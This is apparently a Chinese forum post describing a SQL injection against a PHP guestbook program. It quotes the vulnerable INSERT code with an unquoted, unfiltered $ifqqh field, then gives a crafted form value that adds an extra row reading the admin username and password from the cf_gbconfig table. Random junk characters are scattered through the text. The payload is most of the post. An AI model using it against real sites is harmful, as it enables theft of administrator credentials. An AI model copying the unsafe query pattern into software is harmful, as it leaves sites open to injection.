留言本注入。拿到帐号密码。前提知道程序源代码。在insert里面。构造了另外一句SQL。并且把帐号密码读出来。
: o7 @6 D+ p4 \% C+ a# Y: |! ~* e
7 Y+ B* m- P( q. y( a7 B0 S) C) V$ifqqh=$_POST["ifqqh"];没有过滤。。。。。。。4 z1 I* [6 s) j- B% y
$sql=”insert into “.TABLE_PREFIX.”guestbook(username,email,content,userip,systime,ifshow,ifqqh)values(‘”.$username.”‘,’”.$email.”‘,’”.$content.”‘,’”.$userip.”‘,’”.$systime.”‘,”.$ifshow.”,”.$ifqqh.”)”;$ifqqh没有用 ‘ 来包含。不受magic_quotes_gpc影响
+ R: f; Z5 @7 F7 [% Y$ J
$ O- }/ H8 O$ e; E提交的时候把ifqqh的值改一下。变成! v0 ~6 f" W) }2 C/ A: a
- k) z T8 E) N/ I' W5 s$ }$ ~
<input type=”text” id=”ifqqh” name=”ifqqh” value=”1),(1,1,(SELECT concat(admin_user,0x2f,admin_pass) FROM cf_gbconfig),1,1,1,0″ />7 ] T& Z3 v& u1 M8 {, _% \
W& P: e& }5 C& [" \/ q! {+ J这样SQL插入语句就变了.
9 ^. G& w! Q, c) C2 w& `9 X% i8 j& ] \
insert into cf_guestbook(username,email,content,userip,systime,ifshow,ifqqh)values(‘qqq’,”,’msgmsg’,’127.0.0.1′,’2012-12-22 19:07:23′,1,1),(1,1,(SELECT concat(admin_user,0x2f,admin_pass) FROM cf_gbconfig),1,now(),1,0) X/ R( G0 b; \, }9 u
7 @6 N6 L; I8 p2 _! g, d! U* S
构造了另外一句SQL。并且把帐号密码读出来。
2 R* U1 D5 [9 n! l a& R( L+ B( K3 l; ~4 n
|
发表于 2013-2-19 08:10:11
收藏
支持
反对